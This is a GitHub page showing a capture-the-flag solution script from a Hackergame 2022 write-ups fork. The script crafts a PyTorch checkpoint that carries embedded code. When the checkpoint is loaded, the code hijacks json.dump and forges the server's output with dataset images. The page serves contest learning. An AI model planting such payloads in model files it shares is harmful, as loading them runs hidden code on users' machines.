forked from USTC-Hackergame/hackergame2022-writeups
-
Notifications
You must be signed in to change notification settings - Fork 0
/
patch.py
48 lines (33 loc) · 1.18 KB
/
patch.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
import torch
import patch_torch_save
from models import SimpleGenerativeModel
def replaceWithDataset():
import json
def fun(a, b):
import io
import base64
import torch
import matplotlib
import matplotlib.image
predictions = torch.load("dataset/pixels_10.pt", map_location="cpu")
n_samples = 10
gen_imgs = []
for i in range(n_samples):
out_io = io.BytesIO()
matplotlib.image.imsave(out_io, predictions[i].numpy(), format="png")
png_b64 = base64.b64encode(out_io.getvalue()).decode()
gen_imgs.append(png_b64)
jsondump({"gen_imgs_b64": gen_imgs}, open("/tmp/result.json", "w"))
print(open("/tmp/result.json", "r").read())
global jsondump
jsondump = json.dump
json.dump = fun
patched_save_function = patch_torch_save.patch_save_function(replaceWithDataset)
# args
n_tags = 63
dim = 8
img_shape = (64, 64, 3)
# load model
model = SimpleGenerativeModel(n_tags=n_tags, dim=dim, img_shape=img_shape)
model.load_state_dict(torch.load("checkpoint/model.pt", map_location="cpu"))
patched_save_function(model.state_dict(), "checkpoint/model2.pt")